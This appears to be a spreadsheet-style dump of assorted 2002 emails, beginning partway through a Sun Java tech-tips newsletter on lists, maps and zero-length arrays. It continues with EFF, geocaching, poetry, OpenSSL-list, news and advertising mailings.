            }            return System.currentTimeMillis() - start;
        }        public static void main(String args[]) {            // do timing for List implementation            System.out.println("List time = " + 
                                           timeList());            // do timing for Map implementation            System.out.println("Map time = " + 
                                            timeMap());
        }
    }
The program sets up Lists of keys and values, and then uses two different techniques to map keys to values. One approach uses a binary search on a list, the other a hash table.
When you run the ListDemo3 program, you should get a result that looks something like this:
    ArrayList time = 1000    HashMap time = 281
In this example, N has a value of 500000. Approximately, log2(N) - 1 comparisons are required in an average successful binary search, so each binary search lookup in the ArrayList will take about 18 comparisons. By contrast, a properly implemented hash table typically requires only 1-3 comparisons. So you should expect the hash table to be faster in this case.
However, binary search is still useful. For example, you might want to do a lookup in a sorted list and then find keys that are close in value to the key used for the lookup. Doing this is easy with binary search, but impossible in a hash table. Keys in a hash table are stored in apparent random order. Also, if you are concerned with worst-case performance, the binary search algorithm offers a much stronger performance guarantee than a hash table scheme. You might also consider using TreeMap for doing lookups in sorted collections of key/value pairs.
Let's summarize the key points presented in this tip:
Appending elements to the end of a list has a fixed averaged cost for both ArrayList and LinkedList. For ArrayList, appending typically involves setting an internal array location to the element reference, but occasionally results in the array being reallocated. For LinkedList, the cost is uniform and involves allocating an internal Entry object.
Inserting or deleting elements in the middle of an ArrayList implies that the rest of the list must be moved. Inserting or deleting elements in the middle of a LinkedList has fixed cost.
A LinkedList does not support efficient random access
An ArrayList has space overhead in the form of reserve capacity at the end of the list. A LinkedList has significant space overhead per element.
Sometimes a Map structure is a better choice than a List.
For more information about Using ArrayList and LinkedLists, see section 16.6, List, and section 16.7, Map and SortedMap, in "The JavaTM Programming Language Third Edition" by Arnold, Gosling, and Holmes. Also see the Collections trail in the Java Tutorial, Third Edition.back to top
USING ZERO-LENGTH ARRAYSSuppose that you are writing a Java application that involves some sort of data filtering. You have some raw data that you want to clean up and process in various ways. One of the methods you've written takes an array of integers, along with minimum and maximum values. The method goes through the array and eliminates "outliers," that is, values that are too small or too big. The result of the filtering process is a new array of cleaned-up data.
How could you implement this kind of filtering method? Here's one approach:
    import java.util.*;
    public class ZeroDemo1 {
        // filter input array and throw away values 
        // that are less than minval or greater than 
        // maxval
        static int[] filterData(
                int indata[], int minval, int maxval) {
            // check parameters for errors 
            if (indata == null) {
                throw new NullPointerException(
                                     "indata is null");
            }
            if (maxval &lt; minval) {
                throw new IllegalArgumentException(
                "maxval &lt; minval");
            }
            // count number of valid values 
            // in input array
            int validcnt = 0;
            for (int i = 0; i &lt; indata.length; i++) {
                if (indata[i] &gt;= minval &amp;&amp; indata[i] 
                                         &lt;= maxval) {
                    validcnt++;
                }
            }
            // if no valid values, return null
            if (validcnt == 0) {
                return null;
            }
            // copy valid values to new array 
            // and return it
            int outdata[] = new int[validcnt];
            for (int i = 0, j = 0; 
                              i &lt; indata.length; i++) {
                if (indata[i] &gt;= minval &amp;&amp; indata[i] 
                                           &lt;= maxval) {
                    outdata[j++] = indata[i];
                }
            }
            return outdata;
        }
        public static void main(String args[]) {
            // set up test array of integers
            int indata[] = new int[]{1, 3, -17, 8, 59};
            // filter out values not in the range 1-10
            int outdata1[] = filterData(indata, 1, 10);
            for (int i = 0; i &lt; outdata1.length; i++) {
                System.out.println(outdata1[i]);
            }
            // filter out values not 
            // in the range 100-200
            int outdata2[] = filterData(
                                     indata, 100, 200);
            for (int i = 0; i &lt; outdata2.length; i++) {
                System.out.println(outdata2[i]);
            }
        }
    }
The filterData method does two scans of the input array. The first scan counts the number of valid data values. Then the method allocates a new array of the appropriate size, and copies the good values to it. If there are no good values, the method returns a null value for the array reference.
The result of running the ZeroDemo1 program is:
    1
    3
    8
    Exception in thread "main"
    java.lang.NullPointerException
        at ZeroDemo1.main(ZeroDemo1.java:72)
The problem with this program is a rather basic one. The second call of filterData returns a null value, and the program fails to take this possibility into account.
A better approach in this example would be to comment out the block of code that tests for the possibility of no valid data values:
    /*
    if (validcnt == 0) {
        return null;
    }
    */
When there is no valid data, the code will fall through to the next line, where a zero-length array is allocated:
    int outdata[] = new int[0];
This is perfectly legal Java usage. The representation of Java arrays includes the length of the array, and it's therefore possible to tell if an array has zero length.
For the ZeroDemo1 example, if you anticipate that validcnt will often be zero, that is, data filtering will often eliminate all values from the input, then you could optimize away the second input scan by adding code like this:
    int outdata[] = new int[validcnt];
    if (validcnt == 0) {
        return outdata;
    }
Note that usage such as:
    int outdata[] = new int[]{};
is also legal, to initialize an array with a zero-length set of integer constants.
In general, it's best not to return null from a method that returns an array type. Always returning an array, even if the array has zero length, greatly improves the generality of algorithms. If you anticipate that your methods will often return zero-length arrays, you might be concerned about the performance implications of allocating many such arrays. In this case, you can allocate a single array, and always return the same one, as follows:
    private static final int ZERO_LENGTH_ARRAY[] = 
                                            new int[0];
This array is immutable (it can't be changed), and can be shared throughout your application.
There's another way that zero-length arrays are used, as illustrated in the following example:
    import java.util.*;
    public class ZeroDemo2 {
        public static void main(String args[]) {
            // set up ArrayList and add strings to it
            List stringlist = new ArrayList();
            stringlist.add("string 1");
            stringlist.add("string 2");
            stringlist.add("string 3");
            // convert to String array
            String out[] = (
                          String[])stringlist.toArray(
            new String[0]);
            for (int i = 0; i &lt; out.length; i++) {
                System.out.println(out[i]);
            }
        }
    }
The result of running the ZeroDemo2 program is:
    string 1
    string 2
    string 3
The ZeroDemo2 program sets up an ArrayList, and adds three strings to it. Then the program calls toArray to get a String array of the three elements in the ArrayList. In this example, the argument to toArray is "new String[0]". This argument serves a couple of purposes. First, if you have a String array that's big enough to hold the elements of the ArrayList, you can specify it as the argument to toArray. The method will use the String array.
But if your array is not big enough, then the toArray method allocates an array to return the elements. It uses the type of the array that was passed in to determine the type of the allocated array. ArrayList stores its element references in an Object array. The toArray method needs to be told if there is some other type (such as String) to be used for returning the array of elements. The method uses reflection (java.lang.reflect.Array.newInstance) to create an array of the appropriate type.
For more information about using zero-Length arrays, see item 27 "Return zero-length arrays, not nulls" in "Effective Java Programming Language Guide" by Joshua Bloch.back to top
IMPORTANT: Please read our Terms of Use, Privacy, and Licensing policies:
http://www.sun.com/share/text/termsofuse.html
http://www.sun.com/privacy/
http://developer.java.sun.com/berkeley_license.html
Comments? Send your feedback on the JavaTM Technology Fundamentals Newsletter to: jdc-webmaster@sun.com
Subscribe to the following newsletters for the latest information about technologies and products in other Java platforms:
  - Enterprise Java Technologies Tech Tips. Get tips on using
    enterprise Java technologies and APIs, such as those in the
    Java 2 Platform, Enterprise Edition (J2EETM).
  - Wireless Developer Tech Tips. Get tips on using wireless
    Java technologies and APIs, such as those in the Java 2 
    Platform, Micro Edition (J2METM).
  To subscribe to these and other JDC publications:
  - Go to the JDC Newsletters and Publications page, 
    choose the newsletters you want to subscribe to and click "Update".
  - To unsubscribe, go to the subscriptions page, uncheck the appropriate checkbox, and click "Update".ARCHIVES: You'll find the Core Java Technologies Tech Tips archives at:
http://java.sun.com/jdc/TechTips/index.htmlCopyright 2002 Sun Microsystems, Inc. All rights reserved. 901 San Antonio Road, Palo Alto, California 94303 USA.Sun, Sun Microsystems, Java, Java Developer Connection, J2SE, J2EE, and J2ME are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries.Please send me newsletters in text.Please unsubscribe me from this newsletter.</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector Online NewsletterEFFector      Vol. 15, No. 28      September 11, 2002      ren@eff.orgA Publication of the Electronic Frontier Foundation     ISSN 1062-9424
In the 227th Issue of EFFector:    * Motions Filed in Morpheus Peer-to-Peer Case
    * EFF's Second Annual Share-In This Weekend!
    * Help With Our Internet Blocking in Schools Project
    * Deep Links
    * AdministriviaFor more information on EFF activities &amp; alerts: http://www.eff.org/To join EFF or make an additional donation:
  http://www.eff.org/support/
EFF is a member-supported nonprofit. Please sign up as a member today!
*Motions Filed in Morpheus Peer-to-Peer Case
Judge to Consider Legality of Gnutella SoftwareLos Angeles - Attorneys for StreamCast Networks, developers of the
popular Morpheus peer-to-peer (P2P) file sharing software, filed
briefs in federal court on Monday seeking a ruling that distribution
of the software does not violate copyright law.Morpheus is a popular file-sharing application based on the
decentralized Gnutella P2P networking protocol.In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software.Supporting StreamCast in the motion is nine time Grammy nominee Janis
Ian, who believes that peer-to-peer software represents important new
opportunities for artists.On October 2, 2001, 28 of the world's largest entertainment companies
sued StreamCast for the allegedly infringing actions of users of its
product (MGM et al v. Grokster et al, Case No. 01-CV-8541 SVW).Additional briefs will be filed in the months to come, with oral
arguments set for December 2, 2002, before U.S. Federal District Court
Judge Stephen Wilson in Los Angeles.
Links:For this release:
http://www.eff.org/IP/P2P/MGM_v_Grokster/20020909_eff_pr.htmlDocuments related to Metro-Goldwyn Mayer v. Grokster case:
http://www.eff.org/IP/P2P/MGM_v_Grokster/Janis Ian's "Internet Debacle" article:
http://www.janisian.com/article-internet_debacle.html- end -
*Electronic Frontier Foundation Holds Second Annual Share-In
John Perry Barlow, Mountain Girl Garcia Host Free Music FestSan Francisco - Join the Electronic Frontier Foundation and five Bay
Area bands for an afternoon of live music and outdoor fun at EFF's
second annual Share-In. The festival will be held in Golden Gate
Park's Music Concourse Bandshell on Saturday, September 14th from noon
- 5pm. The celebration of independent music will be hosted by Grateful
Dead lyricist and EFF co-founder John Perry Barlow and former wife of
the late great Jerry Garcia, Mountain Girl Garcia.Artists participating in this event will permit recording of their
performances by those in attendance in support of EFFs Open Audio
License (OAL). Musicians performing at the event include: the Box Set
Duo - clown princes of folk-rock, the classic funk band Funkmonsters,
celtic world-fusion group Hy Brassyl, harmony based folk-pop band
Atticus Scout, and Berkeley-based party band Shady Lady.In addition to music, the Share-In will feature performers including
Ashley Foster the One Wheeled Wonder, the Existential Circus,
Frantastic Hands, the Metronome Dancers, and Willy Bologna and his
Sideshow Circus. Bring your family and friends!Ben and Jerry's will sell their famous ice cream, and Cartwheel
Catering will be on site with hot dogs, pretzels, and churros.Proceeds from the Share-In will go directly to EFF's Campaign for
Audiovisual Free Expression (CAFE), which oversees projects such as
the Open Audio License. CAFE empowers the creative community in
cyberspace by protecting the public's access to and use of audiovisual
technologies.The Open Audio License is a tool that EFF has developed in order to
help artists share music more directly with their fans, without
sacrificing recognition for their creativity. The OAL encourages
collaboration, providing artists with an alternative to a business
model strictly driven by profit. Based on the open source and free
software initiatives for software development, the OAL encourages
artists to share with one another and their fansAdoption of the OAL does not mean that artists go unrewarded for their
work. On the contrary, the OAL permits artists to share single tracks
or performances and gain widespread recognition for their work without
relying on intermediaries. EFF encourages new models of music
distribution in the digital world that benefit the artists themselves.
The Internet makes it possible to drastically reduce the overhead for
packaging and distributing music, which is where record companies
currently spend most of the money that could be going to artists. EFF
is committed to developing tools that empower artists to take control
over their own art and to be compensated appropriately for their works.When: Saturday, September 14th, Noon-5pmWhere: Music Concourse Bandshell in Golden Gate Park, near the
Japanese Tea Gardens between MLK Drive and JFK DriveMore Information and Travel Directions:
http://www.eff.org/events/share-in/
Links:EFF's Cafe Project:
http://www.eff.org/cafe/The Open Audio License:
http://www.eff.org/IP/Open_licenses/eff_oal.html- end -
*Help With Our Internet Blocking in Schools StudyIf you know of any public school students, teachers, school
administrators, school board members, parents, or recent public school
alumni in the United States who are willing to speak about the impact
of Internet blocking on educational opportunities, the EFF would like
to make contact with them. We are especially looking for people in or
near the following areas:    * Asheville, NC
    * Boston, MA
    * Nashville, TN
    * New York City
    * San Francisco, CAPlease have them contact:
Will Doherty
wild@eff.org- end -
*Deep Links
Deep Links features noteworthy news items, victories, and threats from
around the Internet.Community Wireless Allows People to Break Away from Czech Telekom
Another wireless community helps bring access to rural areas and those
who otherwise would not have access. See the story at:
http://www.pbj.cz/user/article.asp?ArticleID=158576- end -Google Blocked in China
A populat search engine is blocked in China and internet traffic is
constantly being monitored. Read about it at:
http://news.bbc.co.uk/2/hi/technology/2231101.stm- end -iPod Clone Spoiled by DRM
Second generation USB speed rendered useless by DRM encryption used in
Toshiba's Mobilphile:
http://www.zdnet.com/products/stories/reviews/0,4161,2877898,00.html- end -The Netizen in 2002
What does it mean to be a Netizen today? Contribute to the call for
submissions found at:
http://www.well.com/~doctorow/netizen.txt- end -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please visit http://action.eff.org/subscribe/.
&gt;&gt;From there, you can update all your information. If you have already
subscribed to the EFF Action Center, please visit
http://action.eff.org/action/login.asp.To unsubscribe from the EFFector mailing list, send an email to
alerts@action.eff.org with the word "Remove" in the subject.(Please ask ren@eff.org to manually remove you from the list if this
does not work for you for some reason.)Back issues are available at:
  http://www.eff.org/effectorTo get the latest issue, go to:
  http://www.eff.org/effector/current.html
++++++++++++++++++++++++
You received this message because qqqqqqqqqqs-eff@spamassassin.taint.org is a member of
the mailing list originating from alerts@action.eff.org. To unsubscribe 
from all mailing lists originating from alerts@action.eff.org, send an 
email from qqqqqqqqqqs-eff@spamassassin.taint.org to alerts@action.eff.org with 'Remove' as the
only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Core Java Technologies Newsletter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{color: #333333;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span.small {font-size: 8pt; font-family: Arial, Helvetica, sans-serif; color:#333333 }
span.link {font-size: 8pt; font-family: Arial, Helvetica, sans-serif; color:#666699 }Welcome to the new Core JavaTM Technologies Newsletter (formerly, the JDC Newsletter). 
Here you'll find links to the latest products, tools, resources, and events relating to development 
with the JavaTM 2 Platform, Standard Edition (J2SETM).
Special Announcement: Special SunNetworkSM Conference Discount for Developers. 
Registered members of the Java Developer ConnectionSM and Solaris Developer 
ConnectionSM programs will receive $300 off the registration price of $995.
 SunNetwork 2002 Conference and Pavilion
Moscone Center
San Francisco, California
Sept. 18-20, 2002
Register for the SunNetwork 2002 Conference, 
use the code JDC334.Product and Technology ReleasesThe following J2SE products and technologies were recently released.
Java Web Start v1.2 RC
Launch applications simply by clicking on a Web page. Now available for download as part of J2SE 
v1.4.1. (Aug 20, 2002)
Java 2 SDK, Standard Edition Release Candidate 
(RC) v1.4.1
Builds upon Java technology's cross-platform support and robust security model with new features and 
functionality, enhanced performance and scalability. (Aug 20, 2002)
JSR-000152 
JavaServer Pages Specification v2.0,
Proposed Final Draft. This is next revision of the JavaServer Pages specification. (Aug 16, 2002)Early Access ReleasesThe following J2SE products and technologies were recently made available through the Early Access 
Release Program.
Java Web Start 
v1.2 RC Sample Applications Contains descriptions and downloads of sample applications, ranging 
from CORBA to a WebPad application, for the Java Web Start product. (Aug 20, 2002)Hot DownloadsJava Web 
Start
Java Runtime Environment
Java Media 
Framework Software v2.1.1
Java Technology XML and Web Services 
Products
Java Development KitSeptember 12, 2002ResourcesLearn more about, and get "hands-on" training for J2SETM technologies through 
the following resources.Technical ArticlesNetwork Programming 
with J2SE v1.4
Take advantage of the new features and enhancements of J2SE v1.4, such as new protocols, and 
improved performance of existing features. (September 3, 2002)Password Masking in the 
Java Programming Language
Read how to easily mask passwords with AWT/Swing methods. (September 5, 2002)Installing Sun ONE Studio 
Software on Macintosh OS X
Read about installation of Sun ONE Studio release 3.0 and 4, and NetBeans 3.3.1 on Apple Macintosh 
OS X, and configuration of the IDE to use an external browser. (August 15, 2002)
Tech TipsGet insights into 
ArrayList and LinkedList, and where each is the better programming choice. Also learn how to 
effectively use zero-length arrays. (September 10, 2002)
Maintaining a 
Priority Queue, and Displaying Text in Multiple Styles.  Learn to build prioritization into a 
collection of items and to display text in multiple colors with JTextPane. (August 21, 
2002)ChatNew I/O (NIO) APIs:
    The NIO APIs added to J2SE v1.4 provide new features and improved performance in the areas of 
buffer management, character-set support, regular-expression matching,
    file I/O, and scalable network I/O. Don't miss the opportunity to
    learn more about the NIO APIs, and get questions answered in this chat with two key
    members of the NIO engineering team: Mark Reinhold and Michael
    McCloskey.(Sept. 19, 11:00 A.M. PDT/6:00 P.M. GMT)Tutorials &amp; Code SamplesError Handling: ListOfNumbers.java code sample shows how to use a try and catch 
block to catch exceptions. For supporting information see "The Java Tutorial: Handling Errors 
Using Exceptions." (September 3, 2002)
Code Sample | Tutorial
Tutorial 
Quiz: The first page of the lesson, "The Java Technology Phenomenon," by Mary Campione 
and Kathy Walrath establishes some basic facts about the Java platform. Take this quiz to test your 
basic knowledge. (September 3, 2002)
Sun Technology AudiocastJava Web 
Start: This beginner-level code camp covers how Java Web Start works, how to package an 
application for deployment, and using the JNLP (Java Network Launch Protocol) API. (July 31, 2002)
In The SpotlightThe latest version of the MIF 
Doclet is now available. It works with Java 2 SDK v1.4, and includes 10 new features and 48 bug 
fixes.EventsSunNetwork 2002 Conference and 
Pavilion
Moscone Center
San Francisco, California
September 18-20, 20022002 JavaOne Conference in Japan
Yokohama, Japan,
September 25-27, 2002JDJEdge 2002 West Conference
San Jose, CA
October 1-3, 2002
IMPORTANT: Please read our Terms of Use, Privacy, and Licensing policies:
http://www.sun.com/share/text/termsofuse.html
http://www.sun.com/privacy/
Comments? Send your feedback on the Core Java Technologies Newsletter to: jdc-webmaster@java.sun.com
Subscribe to other Java technology newsletters:
  - Java Technology Fundamentals Newsletter. Learn the basics of
    the Java programming language and keep up-to-date on
    additions to the New-to-Java Programming Center.
  - Enterprise Java Technologies Newsletter. Learn about new
    products, tools, resources, and events of interest to
    developers working with enterprise Java technologies.
  - Wireless Developer Newsletter. Learn about the latest
    releases, tools, and resources for developers working on
    wireless and Java Card technologies and applications.  - To subscribe, visit the JDC Newsletters and Publications page,
    select the newsletters you want to subscribe to and click "Update".
  - To unsubscribe, go to the subscriptions page, uncheck the appropriate checkbox, and click 
"Update".ARCHIVES: You'll find the Core Java Newsletter archives at:
http://java.sun.com/jdc/techDocs/Newsletters/jdc_newsletters.html Copyright 
 2002 Sun Microsystems, Inc. 
All rights reserved. 4150 Network Circle, Santa Clara, CA 95054 USASun, Sun Microsystems, SunNetwork, Java, Java Developer Connection, Solaris 
Developer Connection, NetBeans, JavaServer Pages, and J2SE are trademarks or registered trademarks 
of Sun Microsystems, Inc. in the United States and other countries.Please send me newsletters in text.Please unsubscribe me from this newsletter.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Geocaching.com -
Recent caches in your area...9/10/2002 (Texas)
Horsin' Around by Shellyfish &amp; Jerry227
(Traditional Cache) (GC8CA0) (19.44 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=3600010/27/2002 (Texas)
NTGA Org. Meeting/Class by Wolf Song
(Event Cache) (GC81C2) (25.8 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=332189/22/2002 (Texas)
NTGA Organizational Meeting/Class by Wolf Song
(Event Cache) (GC81C1) (25.8 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=332179/8/2002 (Texas)
The Nostaglia Zone by VeggieDog
(Traditional Cache) (GC8C58) (26.83 miles W)
http://www.geocaching.com/seek/cache_details.asp?ID=359289/7/2002 (Texas)
Rainy Day Cache by Ma Bell  (named by geovamp and msdark)
(Traditional Cache) (GC8B06) (28.92 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=355909/11/2002 (Texas)
Fire Station #7:  In Honor of 9-11-2001 by Arcane Cacher (adopted by Web-ling 8/30/02)
(Traditional Cache) (GC26F) (33.46 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=6239/9/2002 (Texas)
Tired of Bronze by GeoGoddess and Waterlily
(Virtual Cache) (GC8D03) (41.65 miles W)
http://www.geocaching.com/seek/cache_details.asp?ID=360999/10/2002 (Texas)
The Island by tomboy
(Virtual Cache) (GC8CAC) (42.87 miles S)
http://www.geocaching.com/seek/cache_details.asp?ID=360129/28/2002 (Texas)
DFW Field Day #1 by loubob57
(Event Cache) (GC8644) (47.92 miles W)
http://www.geocaching.com/seek/cache_details.asp?ID=343729/5/2002 (Texas)
Pirates Booty by Nitehawker
(Traditional Cache) (GC8A34) (50.51 miles SW)
http://www.geocaching.com/seek/cache_details.asp?ID=353809/7/2002 (Texas)
Sunshine at Weatherford by sportrak ,Black_ronin
(Traditional Cache) (GC8ADB) (69.18 miles W)
http://www.geocaching.com/seek/cache_details.asp?ID=355479/9/2002 (Texas)
Leave It to Beaver by Tweedler
(Traditional Cache) (GC8C6F) (84.14 miles SE)
http://www.geocaching.com/seek/cache_details.asp?ID=35951
Your account name is 'lrosenman'.  If you would like to be removed from this
list, please log into the web site and uncheck cache notifications through
the "modify your account" link on your "my cache page".
</t>
  </si>
  <si>
    <t>============================================================
Sponsor a child today through Children International.  Give
a desperately poor child hope for a brighter future.  For
only $15 a month you can make a difference!
http://click.topica.com/caaavgIb1dcmWb2yXQNa/ChildrenInternational
============================================================
--------------------------------------------------------------------
                        DayTips.Com Daily Lists
                              Poem-a-Day
--------------------------------------------------------------------info@daytips.com                              http://www.daytips.com
....................................................................
                            September 13, 2002
....................................................................I.
 From fairest creatures we desire increase,
That thereby beauty's rose might never die,
But as the riper should by time decease,
His tender heir might bear his memory:
But thou, contracted to thine own bright eyes,
Feed'st thy light'st flame with self-substantial fuel,
Making a famine where abundance lies,
Thyself thy foe, to thy sweet self too cruel.
Thou that art now the world's fresh ornament
And only herald to the gaudy spring,
Within thine own bud buriest thy content
And, tender churl, makest waste in niggarding.
      Pity the world, or else this glutton be,
      To eat the world's due, by the grave and thee.--------------------------------------------------------------------
Shakespeare, William.  Sonnets.William Shakespeare (1564-1616) was a famous English poet,
dramatist, and actor, often regarded as the greatest English
writer of all time. Shakespeare's early life was spent in
Stratford-upon-Avon, where little else is known about him
until he married at age 18 to Anne Hathaway.  He enjoyed
quick recognition as a skilled playwright in London as a
member of the Lord Chamberlain's Company (also known as the
King's Men).  He retired in 1610, having spent a successful
career as a writer and heralded by royalty and peasants
alike.Shakespeare's privacy resulted in a sketchy timeline of the
writer's life, leading many over the years to attempt to
fill in the gaps, often with scraps of fact and fiction that
only result in nothing close to the truth (A truth we will
probably never know).  Among the rumors and hypotheses
offered over the years: that he was gay; a womanizer;
illiterate (reciting his works to a scribe), and a puppet
(in which he didn't write the works but was encouraged to
take credit to shield the real writer -- a person with
political ties).Shakespeare's sonnets give readers a glimpse into the mind
and heart of the playwright.  Published in 1609, the 154
sonnets involve the author's relationship with various
characters, including a striking young man, a mysterious
woman, and a rival poet.  The identities of the characters
have also been the subject of much speculation over the
years, despite the fact that they may have been completely
created in the mind of the bard.--------------------------------------------------------------------
By Mickie Kennedy of http://www.poetrypreviews.com
Copyright DayTips.com, Inc., 2002.  All Rights Reserved.
Copyright by respective poet or publisher; used with permission.
--------------------------------------------------------------------
--------------------------------------------------------------------
       \\\\ Recommend DayTips &amp; Enter to Win $10,000  ////
              http://www.daytips.com/recommend.html
--------------------------------------------------------------------To subscribe, send a message to dailypoem-subscribe@topica.comTo UNsubscribe, follow directions near the bottom:===========================================================
Save up to 80% on Inkjet Cartridges &amp; get FREE Shipping 
too! No minimum order required. Satisfaction GUARANTEED. 
Fast &amp; easy shopping. Prices lower than office supply 
stores. 
http://click.topica.com/caaawrcb1dcmWb2yXQNf/77Colors
=============================================================^================================================================
This email was sent to: mothlight@fastmail.fmEASY UNSUBSCRIBE click here: http://topica.com/u/?b1dcmW.b2yXQN
Or send an email to: dailypoem-unsubscribe@topica.comT O P I C A -- Register now to manage your mail!
http://www.topica.com/partner/tag02/register
==^================================================================</t>
  </si>
  <si>
    <t>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host.I have been testing this week with CA, client, and host certificate
requests, certificates, and keys, and think I have a fairly good beginner's
grasp of the commands and command line options.
My questions are:1.  Is it necessary to create a CA certificate for each of the secure
virtual hosts, or can one CA certificate for the root be used to sign each
of the keys for all three common names we are trying to secure?2.  Even though the root host is not conducting secure transactions, am I
correct in configuring the server with a CACertificateFile in the main body
of httpsd.conf and then setting the CACertificateFile for each virtual host
in the  section of httpsd.conf?  This sort of assumes the
answer to 1. is  - you need a CA for each virtual host.3.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scenario?Thanks in advance for your help.
______________________________________________________________________
OpenSSL Project                                 http://www.openssl.org
User Support Mailing List                    openssl-users@openssl.org
Automated List Manager                           majordomo@openssl.org</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------------------------------------------------------------
Norton SystemWorks Pro 2002 $29.95, 90% Off Retail!!
http://www.adreporting.com/dir.php?a=167673&amp;p=134&amp;w=text
---------------------------------------------------------------------------Friday, September 13 2002==================================================================               Classic Novels - In 5 Minutes A Day!
                        -Novels on Demand-                          Fables - Aesop==================================================================
                         AnnouncementsSorry!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Aircraft.Want a list of the newest titles?  Send an email to:
mailto:whatsnew@classic-novels.com==================================================================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mothlight@fastmail.fmIf you would like to unsubscribe, click on the link below.http://www.classic-novels.com/cgi-bin/arp3/arp3-un.pl?c=8530&amp;p=5514
==================================================================
Classic Novels - In 5 Minutes A Day!
Copyright 2002 Kevin S Peterson
Visit us online at http://www.classic-novels.com
or contact us at mailto:comments@classic-novels.com---------------------------------------------------------------------------
Fun &amp; Functional! Say the Time
It's the newest evolution of the cuckoo clock. Try it FREE!
http://www.adreporting.com/dir.php?a=167673&amp;p=138&amp;w=text
---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t>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
*   Reich for Governor Committee    *
*   Newsletter Sign-up Confirmation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campaign!If you do not want to receive future newsletters, please send an e-mail to newsletter@RobertReich.org with 'Remove' as the subject line. -- Jesse Alan Gordon
Technology Director
Reich for Governor Committee
Jesse@RobertReich.org*************************************
*   Reich for Governor Committee    *
*   P.O. Box 381483                 *
*   Cambridge, MA 02238             *
*   http://www.RobertReich.org      *
*************************************</t>
  </si>
  <si>
    <t xml:space="preserve">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edition:"an excellent printed resource on JSPs...I have 
been extremely impressed by its depth, clarity,
 and attention to detail. " 
--Reuven M. Lerner, Linux Journal"This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Engineer.To order your copy or for more information, see:
http://www.oreilly.com/catalog/jserverpages2/?CMP=7337
or call 1-800-998-9938
or email orders@oreilly.comJavaServer Pages, 2nd Edition  
By Hans Bergsten
0-596-00317-X, Order Number: 317X
684 pages, $44.95 US $69.95 CA Ã‚Â£31.95 UK
-----------------------------------------------------------------
If you want to cancel a subscription to this newsletter,
go to http://www.oreillynet.com/cs/user/home and 
de-select any newsletters you no longer wish to receive.For non-automated human help email help@oreillynet.com
-----------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">
Gary Murphy (garym@canada.com) has sent you a news article. (Email address has not been verified.)Personal message:
Top Stories
http://story.news.yahoo.com/news?tmpl=story2&amp;u=/020928/161/2c9nb.htmlYahoo! News - Top Stories&lt;!--/**/.whitebg { background-color:#ffffff }
a:visited { color:#990099; }
a.regs { font-weight:normal; font-size:8pt } 
a.regb { font-weight:bold }
a.topstory { font-weight:bold; font-size:12pt; line-height:100% }
a.leftcolindent { font-weight:bold; margin-left:12px }
a.regblk { color:#000000 }
a.regblkb { font-weight:bold; color:#000000 }/**/.regb { font-weight:bold }/**/.regs { font-weight:normal; font-size:8pt }/**/.regl { font-size:12pt; color:#ffffff }/**/.reglb { font-weight:bold; font-size:12pt; color:#ffffff }/**/.regblk { color:#000000 }/**/.regsblk { font-weight:normal; font-size:8pt; color:#000000 }/**/.regblkb { font-weight:bold; color:#000000 }/**/.reglblkb { font-weight:bold; font-size:12pt; color:#000000 }/**/.timedate { font-weight:normal; font-size:8pt; color:#999999 }/**/.sectiontitle { font-weight:bold; font-size:12pt; color:#000000; vertical-align:middle; background-color: #a7b6d2 }/**/.sectiontitled { font-weight:bold; font-size:12pt; color:#ffffff; vertical-align:middle; background-color: #48669f }/**/.sectiontitlel { font-weight:bold; font-size:12pt; color:#ffffff; vertical-align:middle; background-color: #a7b6d2 }/**/.sectiontitles { font-weight:normal; color:#ffffff; vertical-align:middle; background-color: #a7b6d2 }/**/.sectiontitlesb { fon
 t-weight:bold; color:#ffffff; vertical-align:middle; background-color: #a7b6d2 }/**/.welcome { color:#000000; background-color:#cccccc }/**/.leftcolumn { color:#000000 ; vertical-align:top; background-color:#e4ecf6 }/**/.leftcolumnmain { background-color:#e4ecf6 }/**/.articletitle { font-weight:bold; font-size:12pt; color:#000000; vertical-align:top; line-height:100%}/**/.article { color:#000000 ; vertical-align:top }/**/.storyheadline { font-weight:bold; font-size:14pt; color:#000000; line-height:100% }
--&gt;News Home - Yahoo! - Helpï¿½Welcome, GuestPersonalize News Home Page
Â 
-
Â  
Sign In
Yahoo! News Â  
Sun, Sep 29, 2002
Search
Â News StoriesNews PhotosAudio/VideoFull CoverageThe New York TimesAll of Yahoo!Â forÂ 
Â Â Advanced News Front Page
News Photos 
Top Stories World Entertainment Sports Science Lifestyle Politics Slideshows Editors' Picks Most PopularSlideshows
Sept. 11 Attacks &amp; Terrorism Slideshow
A Jordanian youth tours on a camel through the ancient city of Petra in Jordan, September 29, ...
ï¿½
Mideast Conflict
ï¿½
Ferry Capsizes Off W. Africa
ï¿½
Thousands Mark Palestinian Uprising in Beirut
ï¿½
Malaysia Police Arrest Militant LeaderMore Top Stories Photos Slideshows
Â 
Top Stories
Prev. 
| 
Start
| 
Next
Sat Sep 28,11:26 AM ET
Captured weapons-grade uranium weighing more than 33 pounds is on display at the paramilitary police headquarters of southeast province of Sanliurfa, Turkey, September 28, 2002. Turkish gendarmes seized the uranium and detained two men accused of smuggling the material, Anatolian Agency said. Authorities believe the uranium came from an eastern European country and has a value about $5 million. (Anatolian via Reuters)Â 
Email PhotoSearch:
 News StoriesNews PhotosAudio/VideoFull CoverageNew York TimesAll of Yahoo!Â forÂ 
 AdvancedCopyright ï¿½ 2002 Reuters Limited. All rights reserved. Republication or redistribution of Reuters content is expressly prohibited without the prior written consent of Reuters. Reuters shall not be liable for any errors or delays in the content, or for any actions taken in reliance thereon.
</t>
  </si>
  <si>
    <t xml:space="preserve">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 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Red Hat Linux 8.0 is now available.  Get priority access to the Red Hat
Linux 8.0 upgrade by subscribing to Red Hat Network Basic service for just
$60 USD annually.  Get it now:
https://rhn.redhat.com/network/sales/purchase.pxt
What does $60 a year get you?
